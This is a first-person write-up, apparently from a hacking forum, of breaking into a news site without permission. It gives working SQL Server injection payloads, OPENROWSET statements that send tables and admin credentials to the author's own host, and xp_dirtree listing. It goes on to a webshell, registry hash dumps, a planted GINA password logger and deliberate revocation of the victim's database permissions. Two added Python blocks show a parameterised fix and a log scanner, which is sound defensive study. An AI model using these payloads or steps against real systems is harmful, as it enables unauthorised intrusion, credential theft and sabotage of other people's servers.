Author: Difficulties
One day a friend sent me a URL and asked me to get a shell on it. It was a news site.
At first glance every page was static HTML, presumably generated by something like a CMS: only the back end is dynamic, and the front end is all generated static pages. So I pulled out WWWSCAN and started scanning directories to see whether I could find an upload point. Because the dictionaries are large and WWWSCAN takes a long time, I started looking for injection points on Google at the same time, using site:www.xxxxxx.com inurl:asp to find all the ASP files and testing them one by one. During testing I found that an anti-injection program was used across the whole site, and some functions additionally used checks such as isnumeric. After a long period of manual probing I finally found an INSERT injection point on a news comment page. Entering a single quotation mark (') in the comment field returns an error.
The error message shows that the database is SQL Server.
Entering two single quotes (''):
the page returns normally, so this may be an injection point.
After testing, I found that the following statement could be injected successfully:
"',1)--sp_password"
Entering the statement above in the text box, the comment is posted successfully and no error occurs, which confirms this is an injection point. However, INSERT injection is awkward to use: because the VALUES clause does not allow any SELECT statement, the only way to read data is to use OPENROWSET to send it back to my own machine. Before doing that I needed to determine the SQL Server version, the current user's permissions, the current database name, and whether the site and the database are on separate servers.
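As an added illustration of the injection point described above (not code from the original write-up), the following Python script rebuilds the comment INSERT in two forms over an in-memory SQLite table, a constructed stand-in for the site's SQL Server schema whose column names are assumed: one that splices the comment text into the statement string, as the vulnerable page evidently did, and one that binds it as a parameter. It reproduces the three probes from the text: a single quote raises a database error, two quotes pass, and the closing payload rewrites the statement so that attacker-chosen values are stored. With a bound parameter the same inputs are stored verbatim and no error ever reaches the page.

```python
import sqlite3

# Constructed stand-in for the site's comments table; column names are assumptions.
SCHEMA = "create table comments (id integer primary key, content text, newsid integer)"

# The write-up's probing input, without the sp_password suffix (that suffix only
# affects SQL Server's trace logging and means nothing to SQLite).
PROBE = "', 1)--"


def make_db():
    """Fresh in-memory database with the comments table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def last_row(conn):
    """The most recently stored (content, newsid) pair."""
    return conn.execute(
        "select content, newsid from comments order by id desc limit 1"
    ).fetchone()


def insert_comment_concat(conn, content, newsid):
    """Vulnerable shape: the comment text is spliced into the SQL string."""
    sql = "insert into comments (content, newsid) values ('%s', %d)" % (content, newsid)
    conn.execute(sql)
    conn.commit()
    return last_row(conn)


def insert_comment_param(conn, content, newsid):
    """Hardened shape: the driver binds the value, so quotes never reach the SQL parser."""
    conn.execute("insert into comments (content, newsid) values (?, ?)", (content, newsid))
    conn.commit()
    return last_row(conn)


def raises_db_error(insert_fn, content, newsid=42):
    """True if the insert raises a database error for this input: the signal the probes look for."""
    conn = make_db()
    try:
        insert_fn(conn, content, newsid)
    except sqlite3.Error:
        return True
    return False


def demo():
    """Store the payload through both code paths; return (tainted_row, safe_row)."""
    tainted = insert_comment_concat(make_db(), PROBE, 42)  # ('', 1): attacker chose both values
    safe = insert_comment_param(make_db(), PROBE, 42)      # ("', 1)--", 42): stored as plain text
    return tainted, safe


if __name__ == "__main__":
    print("single quote errors (concat):", raises_db_error(insert_comment_concat, "'"))
    print("two quotes error (concat):   ", raises_db_error(insert_comment_concat, "''"))
    print("single quote errors (param): ", raises_db_error(insert_comment_param, "'"))
    print("rows:", demo())
```

SQLite's execute() refuses a second statement in one call, so the stacked-query part of the later payloads is not reproducible here; SQL Server accepts batches, which is what the OPENROWSET technique in the write-up depends on. The defensive point is the same either way: bind values, and return a generic error page rather than the driver's message, since the conversion errors quoted in the text are the whole data channel.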
I submitted the following statements in turn:
"',cast(@@version as int),2000)--sp_password" returned the version string "Microsoft SQL Server 2005-8.00.2039 (Intel X86) May 3 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)", so the database is SQL Server 2K.
"',cast(system_user as int),)--sp_password" returned the login name of the current database connection, "myxxxxxxer", which is not sa.
"',cast(ltrim(is_srvrolemember('sysadmin'))+'A' as int),)--sp_password" returned "Syntax error converting the varchar value '0a' to a column of data type int", meaning the current user is not a member of the sysadmin role.
"',cast(ltrim(is_member('db_owner'))+'A' as int),)--sp_password" returned "Syntax error converting the varchar value '0a' to a column of data type int", so it is not a member of db_owner either. It looks like only public.
"',cast(ltrim(is_member('public'))+'A' as int),)--sp_password" returned "Syntax error converting the varchar value '1a' to a column of data type int", so the permission really is only public.
"',cast(@@servername+'|'+host_name() as int),)--sp_password" returned "Syntax error converting the nvarchar value 'gnrb-ZGGZW|xxxxxx' to a column of data type int", which shows that the web site and the database are on separate servers.
"',cast(db_name() as int),)--sp_password" returned the database name, "365NEWS".
So the situation is: a SQL Server 2K database, public permissions only, and the site and the database on separate servers. The first step is to use OPENROWSET to send data back to my own machine, then get a webshell.
By this time WWWSCAN had finished, but annoyingly it had not found the back-end address. Sweat. I set that aside for the moment and looked at the data in the database first; maybe a table would hold some addresses.
First, check whether the database server can connect out to the Internet. I used NC to listen on port 80 locally, then executed "',1);insert into OPENROWSET('sqloledb','2017.35.xxx.xx,80';'xxx';'XXX','SELECT 1') select 1--sp_password".
NC responded immediately, and I obtained the IP address of the database server.
So I set up a local SQL Server and ran the following statement in the local PUBS database to create a table that will receive the data returned from the server:
create table op (value varchar(8000))
Then submit at the injection point:
"',222,1);insert into OPENROWSET('sqloledb','100.35.xxx.xx';'test';'000000','select [value] FROM pubs..op') select name from sysobjects where xtype='u'--sp_password"
Running select * from op locally returned all the table names in the database. The admin, adminmsg and users tables are worth noting; the other tables held useless data.
Submit again:
"',222,1);insert into OPENROWSET('sqloledb','100.35.xxx.xx';'test';'000000','select [value] FROM pubs..op') select [name] from syscolumns where id=object_id('admin')--sp_password"
The field names of the admin, adminmsg and users tables were obtained in the same way.
Submit again:
"',222,1);insert into OPENROWSET('sqloledb','100.35.xxx.xx';'test';'000000','select [value] FROM pubs..op') select [username]+'|'+[password] from admin--sp_password"
The contents of the admin and users tables were obtained in the same way. All of them are accounts and passwords, but they are of no use for now, because there is no back end to log in to and the passwords are MD5 hashes, many of which cannot be cracked.
How to find the back end was the problem. Here adminmsg is a table worth noting: from its name, messages sent by administrators should be stored in it, so there is probably a messaging function for administrators in the back end, and all of those messages would be in this table.
Maybe there is something sensitive in it?
First use
"',222,1);insert into OPENROWSET('sqloledb','100.35.xxx.xx';'test';'000000','select [value] FROM pubs..op') select count(*) from adminmsg--sp_password"
to check the number of messages. There were more than a thousand, which means the script might time out.
So I used LIKE to do a fuzzy search and submitted
"',222,1);insert into OPENROWSET('sqloledb','192.35.xxx.xx';'test';'123','select [value] FROM pubs..op') select top 100 cast(msgContent as varchar(8000)) from adminmsg where msgContent like '%background address%'--"
Then I kept changing the search keyword and pulled sensitive data out of the adminmsg table, trying keywords such as "background", "password", "admin", "login.asp", "upfile" and "upload". For example:
Some back-end management addresses were found, but they all belong to sub-sites, and most are either invalid or have no working functions after logging in. Depressing.
I could not get into the main site directly, so I checked whether I could take over the database server instead. I had obtained its IP address when sending the data back. Scanning it with NMAP showed port 80 open, and I found a sub-site hosted on the database server. Let's get a shell on this sub-site first.
First run this in the local PUBS database:
create table dir (n varchar(200), d int, f int);
Then submit the following statement to list directories and check whether there are any usable files on the sub-site:
"',200,1);create table #dir (n varchar(200), d int, f int);insert into #dir exec master..xp_dirtree 'C:\',222;insert into OPENROWSET('sqloledb','192.35.xxx.xx';'test';'123','select * FROM pubs..dir') select * from #dir;drop table #dir--sp_password"
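As an added, defender-side example (not code from the write-up), the following Python scanner runs the statement shapes this write-up relies on, from the error-based probes through the OPENROWSET data returns and the xp_dirtree listing above, over constructed SQL statements of the kind a SQL Server trace or application query log would hold: the --sp_password suffix used to keep the statement out of the trace, cast() of server metadata functions to leak values through conversion errors, OPENROWSET pointed at an outside host to ship rows out, stacked statements after a closed VALUES list, and xp_dirtree. It also pulls the data-source host out of each OPENROWSET call so an analyst can see where rows were being sent. The sample statements, the column names and the address 198.51.100.7 are all constructed.

```python
import re

# Constructed sample statements modelled on the shapes in the write-up (not real logs);
# 198.51.100.7 is a documentation address standing in for the attacker's listener.
SAMPLE_STATEMENTS = [
    "insert into comments (content, newsid, userid) values ('nice article', 42, 7)",
    "insert into comments (content, newsid, userid) values ('', cast(@@version as int), 2000)--sp_password', 42, 7)",
    "insert into comments (content, newsid, userid) values ('', cast(ltrim(is_srvrolemember('sysadmin'))+'A' as int), 1)--sp_password', 42, 7)",
    "insert into comments (content, newsid, userid) values ('', 222, 1); insert into openrowset('sqloledb','198.51.100.7';'test';'x','select [value] from pubs..op') select name from sysobjects where xtype='u'--sp_password', 42, 7)",
    "select top 10 title from news where categoryid = 3",
    "exec master..xp_dirtree 'c:\\', 1, 1",
]

# Each rule is (label, compiled pattern); the label is what an alert would carry.
RULES = [
    ("sp_password hidden in a comment", re.compile(r"--\s*sp_password", re.I)),
    ("ad hoc distributed query", re.compile(r"\bopen(rowset|datasource)\s*\(", re.I)),
    ("error-based metadata leak via cast", re.compile(
        r"\bcast\s*\(.*?(@@version|@@servername|system_user|db_name\s*\(|host_name\s*\(|is_srvrolemember\s*\(|is_member\s*\()",
        re.I)),
    ("filesystem listing via xp_dirtree", re.compile(r"\bxp_dirtree\b", re.I)),
    ("stacked statement after closed VALUES list", re.compile(r"\)\s*;\s*(insert|exec|create|drop)\b", re.I)),
]

# Second quoted argument of OPENROWSET('provider', 'datasource';'user';'pwd', 'query').
OPENROWSET_SOURCE = re.compile(r"\bopenrowset\s*\(\s*'[^']*'\s*,\s*'([^';]+)'", re.I)


def scan(statements):
    """Return (statement_number, rule_label) for every rule that fires, in input order."""
    findings = []
    for number, stmt in enumerate(statements, 1):
        for label, pattern in RULES:
            if pattern.search(stmt):
                findings.append((number, label))
    return findings


def exfil_targets(statements):
    """Data-source hosts named in OPENROWSET calls: outbound SQL to these is the exfiltration channel."""
    targets = []
    for stmt in statements:
        for match in OPENROWSET_SOURCE.finditer(stmt):
            targets.append(match.group(1))
    return targets


if __name__ == "__main__":
    for number, label in scan(SAMPLE_STATEMENTS):
        print(f"statement {number}: {label}")
    print("openrowset targets:", exfil_targets(SAMPLE_STATEMENTS))
```

Every one of these rules corresponds to something the write-up shows working against a public-only login, so the hardening that goes with the detection is the configuration side: a web login that is not in sysadmin is necessary but, as the text demonstrates, not sufficient while ad hoc distributed queries and outbound connections from the database host remain allowed.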
After a long time I finally found an ACCESS database stored with an .asp extension, and then a page that writes into that database. I wrote a one-line shell into it and successfully obtained a webshell. Escalating privileges from there was easier; after getting in, 360EXP got me the server:
After taking the database server, I found it was not in the same subnet as the main site.
So I started by collecting information on the database server.
PCANYWHERE was installed on the server; I found two CIF files and recovered two passwords from them. It looked as if the main site also had PCANYWHERE open. I tried it and connected with one of the CIF passwords, but the main site server was locked and could not be used.
I continued collecting information on the database server, but it seemed fairly clean: apart from the ASP and HTML of the site program, there was nothing else.
McAfee was installed on the server, and everything I uploaded, such as PWDUMP, was killed. McAfee cannot be stopped without its password.
The only option was to grab the hashes manually, with the following commands:
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
This exports the hash information from the registry. I downloaded the three files to my own machine and imported them into CAIN, which gave the hashes on the database server:
However, the hashes of the accounts in the administrators group are all ADD3 and could not be cracked. After recovering the plaintext passwords of a few other accounts and combining them with the back-end passwords saved in the database, I tried to log on to the main site server. That still failed.
The only thing left was to plant a GINA and wait for the administrator to log on. Because of McAfee, the GINA I had on hand was not killed but would not work for other reasons. In the end I found a GINA written by LZX on the forum and planted it successfully, then quietly waited for the administrator to log on.
After four or five days with no logon, I sent them an email reminding them that their servers had been compromised. They did nothing about it. Sweat.
So I connected to SQL Server on the database server and removed the select and update permissions of all users on the admin and users tables. For example:
Now the main site's back end should be unable to log on; if they want to log on, they will have to find the reason.
This really worked: after about three or four hours the administrator logged on to the server, and I successfully recorded a 22-digit purely numeric password, a combination of two mobile phone numbers. With these two phone numbers I rushed at the main site server again and failed again. Combining them with the earlier passwords in different ways still did not work. I was stuck here and did not know how to proceed.
This went on for more than ten days. Then I decided to try again.
Now I had a new idea. In fact, as long as I can find the back end of the main site, things will be much better than they are now.